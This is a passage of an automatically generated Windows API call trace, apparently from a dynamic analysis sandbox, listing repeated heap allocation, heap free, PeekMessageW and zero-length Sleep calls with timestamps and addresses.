RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.917] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.917] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.917] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.917] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.917] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.917] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.917] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.917] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.917] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.917] Sleep (dwMilliseconds=0x0) [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.917] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.917] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.917] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.918] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.918] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.918] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.918] Sleep (dwMilliseconds=0x0) [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.918] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.918] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.918] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.919] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.919] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.919] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.919] Sleep (dwMilliseconds=0x0) [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.919] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.919] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.919] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.920] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.920] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.920] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.920] Sleep (dwMilliseconds=0x0) [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.920] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.920] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.920] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.921] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.921] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.921] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.921] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.921] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.921] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.921] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.921] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.921] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.921] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.921] Sleep (dwMilliseconds=0x0) [0273.921] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.921] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.921] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.921] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.921] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.921] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.921] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.921] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.921] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.921] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.921] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.921] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.922] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.922] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.922] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.922] Sleep (dwMilliseconds=0x0) [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.922] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.922] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.922] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.922] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.923] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.923] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.923] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.923] Sleep (dwMilliseconds=0x0) [0273.923] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.923] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.923] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.923] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.923] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.923] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.923] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.923] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.923] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.923] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.923] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.923] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.924] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.924] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.924] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.924] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.924] Sleep (dwMilliseconds=0x0) [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.924] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.924] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.924] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.924] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.924] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.924] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.924] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.924] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.924] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.924] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.925] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x4) returned 0xf33b98 [0273.925] Sleep (dwMilliseconds=0x0) [0273.925] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xed94c0 | out: hHeap=0xcc0000) returned 1 [0273.925] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33b98 | out: hHeap=0xcc0000) returned 1 [0273.925] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.925] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.925] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.925] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.925] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.925] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x38) returned 0xf40e00 [0273.925] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.925] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf40e00 | out: hHeap=0xcc0000) returned 1 [0273.925] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.925] HeapFree (in: hHeap=0xcc0000, dwFlags=0x0, lpMem=0xf33ad8 | out: hHeap=0xcc0000) returned 1 [0273.925] PeekMessageW (in: lpMsg=0x8dfb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8dfb04) returned 0 [0273.925] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x8) returned 0xf33ad8 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, Size=0x10) returned 0xed94c0 [0273.926] RtlAllocateHeap (HeapHandle=0xcc0000, Flags=0x0, 